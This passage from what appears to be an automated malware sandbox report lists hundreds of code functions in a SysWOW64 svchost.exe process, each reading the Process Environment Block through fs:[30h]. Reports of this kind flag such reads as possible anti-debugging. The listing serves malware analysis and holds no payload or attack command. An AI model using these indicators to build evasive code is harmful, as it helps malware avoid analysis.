                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]1_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h]1_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]1_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]1_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]1_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]1_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]1_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]1_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]1_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]1_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]1_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]1_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]1_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]1_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]1_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]1_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
